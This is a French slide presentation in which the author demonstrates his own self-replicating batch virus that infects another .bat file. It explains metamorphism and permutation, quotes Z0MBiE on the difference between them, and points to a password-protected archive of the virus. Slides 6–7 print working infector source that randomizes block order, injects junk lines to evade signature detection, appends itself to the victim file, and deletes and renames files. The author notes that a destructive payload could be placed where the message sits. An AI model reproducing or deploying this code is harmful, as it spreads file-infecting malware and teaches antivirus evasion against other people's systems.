Télécharger la présentation
La présentation est en train de télécharger. S'il vous plaît, attendez
Publié parGisèle Bourgeois Modifié depuis plus de 6 années
1
COMPUTER VIRUS BATCH - VIRUS avec PERMUTATION / METAMORPHISME
Par SAMUEL DE CRUZ – diplômé en Informatique (BAC STG GSI), en anglais (CML TOEIC DCL4B2) - et Artiste Futuriste (Image : The Thing 2)
2
Étude de mon virus qui infecte un autre fichier bat.
INFECTION D’UN FICHIER VICTIME BATCH - VIRUS avec PERMUTATION / METAMORPHISME Étude de mon virus qui infecte un autre fichier bat. Complication : comprendre et appliquer à la lettre la définition des mots comme « Métamorphisme – polymorphisme – permutation » est bien difficile. En effet cette complication, je pense, vient du fait que les définitions varient selon les Hackers et les experts informaticiens (équipe Antivirus). Si une entreprise Antivirus présente une définition du polymorphisme, celle-ci se révèle ultra restreinte par rapport aux explications et idées du polymorphisme que l’on trouve dans les e-magazines 29A. Des livres d’écoles et des Antivirus parlent du polymorphisme comme un algorithme de chiffrement qui change ses calcules pour obtenir des résultats identiques (4+2 = 6 et 8-2 =6), et que ce calculateur doit être dans le virus. Mais en fait, au travers des travaux des Hackers, on remarque que le concept du polymorphisme est ultra vaste… nous y trouvons des moteurs poly externes au virus, parfois sous d’autres formats, parfois internes, parfois le virus porte plusieurs moteurs de chiffrement et pratique une sélection sans jamais changer les opérandes. Je le redirais toujours : l’étendue de la vision du vrais hacker est toujours plus vaste et sauvage que ceux qui œuvrent dans légalité. Nous pouvons aussi voir cette complication concernant le métamorphisme : les possibilités d’un virus métamorphique varient selon le langage utilisé, l’assembleur et le batch n’auront aucunement les mêmes performances des générations futures du virus. Devons-nous donc garder la même définition malgré les différences des formats ? D’autres questions envahissent notre esprit : la différence entre Permutation et Métamorphisme ?
3
Le Hacker virtuose, ZOMBIE, créateur de plusieurs virus ingénieux (ZPERM) propose la différence entre Permutation et Métamorphisme ainsi : (bref, en FR : la permutation permet de nouvelles générations différentes du virus avec du code ancien. Le métamorphisme permet de nouveaux virus structurellement différents avec nouveaux codes) METAMORPHISM AND PERMUTATION: FEEL THE DIFFERENCE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Tasks of the metamorphism and permutation technologies are to make virus more complex, thus 1. prolonging time of writing antiviral code, and 2. increasing time of the infected objects detection. But, contrary to public opinion, implementations of these techonogies are different! Metamorphism means that your virus contains some [encrypted] data which is used to generate new polymorphic copy. As a rule, new polymorphic copy will be only executed after its generation, so it may contain any trash instructions and be of any size. Typical metamorphic viruses are TMC and LEXOTAN. Permutating viruses are NOT containing such encrypted data, they are using only current code to generate new polymorphic copy. Permutating virus always must be able to get length of any own instruction. This may be achieved by writing disassembler (ZCME,RPME) or making all instructions of the same length (in the PLY-viruses all instructions are NOP-padded to 3-byte length). So, metamorphism means GENERATING NEW CODE, and permutation means USING OLD CODE. Z0MBiE
4
Personnellement, je dirais cela : étant donné que certains langages et outils informatiques, scripts, codages, ne sont pas tout aussi proche du langage bas-niveau comme l’assembleur, alors les définitions et applications (du polymorphisme – métamorphisme et permutation) sont flexibles et spectrales. Le métamorphisme sera pur et ultra performant en Assembleur, mais en VBS et BATCH, par exemple, il le sera moins. Le virus que je vous présente aujourd’hui est un mélange de métamorphisme et de permutation, qui n’est donc pas aussi beau et pur que le travail de haute estime fait par les grands virtuoses : les sorciers du binaire comme ZOMBIE, mais qui, néanmoins, apporte des résultats d’infections et de mutations remarquablement bien surprenant. Mais avant de débuter, un dernier exemple de différentes définitions pour le métamorphisme. KASPERSKY : Un virus métamorphique est un virus qui peut se transformer par conversion, modification et réécriture de son propre code. COMPUTER KNOWLEDGE : Some viruses completely rewrite themselves on each infection in order to attempt to avoid detection. BLACK HAT HACKING - The techniques of polymorphism and metamorphism change the form of each instance of software in order to evade “pattern matching” detection during the detection and investigative process.
5
Structure du virus avant infection
Structure du virus avant infection. Virus : par Samuel De Cruz (NEPRAM HACKER) RANDOMIZING sélecteur de chapitre. Chapitre ordre blocs : A C B Chapitre ordre blocs : B A C Chapitre ordre blocs : C B A Générateur de TRASH / JUNK TYPE commande pour la copie original du virus souche.
6
CHAPITRE avec un ordre de bloc possibles. Ici, A C et B
@echo off copy victime.bat x.txt off>>x.txt set POLYA=A%random%AAA%random%A echo set %POLYA%=echo>>x.txt echo goto :A>>x.txt :calculator set /a n=%random%%%3 if %n%==0 goto :M1 if %n%==1 goto :M2 if %n%==2 goto :M3 :M1 :A11 echo :X%random%X%random%X>>x.txt echo :A>>x.txt echo %%%POLYA%%% A>>x.txt echo goto :B1>>x.txt goto :C11 :C11 echo :C1>>x.txt echo %%%POLYA%%% C>>x.txt echo goto :Z>>x.txt goto :B11 :B11 echo :B1>>x.txt echo %%%POLYA%%% B>>x.txt echo goto :C1>>x.txt goto :JUNK POLYMORPHISME : pour la commande message : ici echo sera en « set » différent RANDOMIZING CHAPITRE avec un ordre de bloc possibles. Ici, A C et B Ici on peut mettre une attaque violente – (pour la bienveillance, uniquement un message sera codé)
7
Fin des bloc (pour la permutation)
:Z echo next generation pause > NUL EXIT :JUNK cls @ECHO OFF FOR /F "tokens=*" %%A IN (x.txt) DO ( ECHO %%A ( ECHO REM XXX%random%XXX%random%XXX%random%XXX ) ) >> victime.txt Type %~nx0 >> victime.txt ECHO Y | DEL x.txt ECHO Y | DEL victime.bat rename victime.txt victime.bat Générateur de TRASH JUNK Effacement des fichiers de travail pour le virus
8
Notre cible : la victime qui sera infectée
Notre virus métamorphique/permutation Script de la victime
9
Le fichier victime dans son fonctionnement normal : il nous dit BONJOUR et nous présente la date et l’heure ! =) Nous allons l’infecté, et voir qu’il gardera son bon fonctionnement, tout en étant brutalement contaminé !
10
Alors que l’infection vient d’être effectuée, nous remarquons que son fonctionnement est normale : le virus n’a pas dérangé le fichier victime…mais…mais alors ? Qu’à fait le virus ? Script de la victime. (pour son bon fonctionnement) CHAPITRE de la violence – l’infection + métamorphisme / permutation RANDOMIZING sélecteur de chapitre. Chapitre ordre blocs : A C B Chapitre ordre blocs : B A C Chapitre ordre blocs : C B A Générateur de TRASH / JUNK TYPE commande pour la copie original du virus souche.
11
VICTIME VIRUS VICTIME VIRUS
Métaphore fantastique de l’infection (The Thing)… Le nouveau fichier victime est un mélange complexe du virus et de la victime, ne formant désormais qu’un... VICTIME VICTIME VIRUS VIRUS Heureusement que nous faisons une étude bienveillante, je vous laisse imaginer le potentiel de destruction et d’horreur d’un virus informatique complet, avec ses codes de violences…
12
Le virus avant infection
Fichier victime infectée
13
Le fichier victime avant infection
Fichier victime infectée
14
Le fichier victime garde son bon fonctionnement malgré le fait qu’il est totalement contaminé. Aussi, pour l’étude, j’ai programmé mon virus pou qu’il m’affiche les blocs ABC comme bien présent dans l’algorithme ! Pourtant…dans l’algorithme, l’ordre n’est pas A puis B puis C… les blocs ABC comme bien présent dans l’algorithme
15
Je précisais auparavant que mon virus me disait qu’il y à bien A B C comme blocs d’infections dans le fichier victime mais…cet ordre est-il ainsi dans l’algorithme ? NON ! Je vous présente la permutation, ou ce que je nomme en batch le métamorphisme par bloc ( bien que cela ne soit pas aussi pur qu’en assembleur). Ici dans l’algorithme l’ordre est A C et B. Le virus à écrit en ordre différent son contenu, mais arrive à s’y retrouver via les « goto ». Le corps du virus à changé dans son ordre et sa structure dans le fichier victime : métamorphisme et permutation en batch.
16
Une comparaison entre mon virus (BATCH) métamorphique et permutation
Une comparaison entre mon virus (BATCH) métamorphique et permutation. Et celui de ZOMBIE en Assembleur Le métamorphisme et la permutation en virologie batch ne sont pas aussi puissantes que l’assembleur… Je n’ai pas de décrypteur et d’encrypteur interne par exemple. Mais j’ai bien : Garbage generation Trash/Junk lines Permutation Bloc randomizing Poly set …
17
Double cliquer sur l’icône pour extraire le virus et l’étudier
Double cliquer sur l’icône pour extraire le virus et l’étudier. Contient aussi le fichier victime. POUR USAGE NON VIOLENT. MDP : virtuality. Auteur : Samuel De Cruz (NEPRAM HACKER catégorie White Hat). Au respect de l’ingéniosité en matière de virologie informatique et aux vrais Hackers, les…virtuoses de l’océan binaire sauvage. Ce document à pour motivation la curiosité et l’intellectualisme. Pour usage non violent ! Utilisation pour nuire autrui strictement interdite - Contact :
Présentations similaires
© 2024 SlidePlayer.fr Inc.
All rights reserved.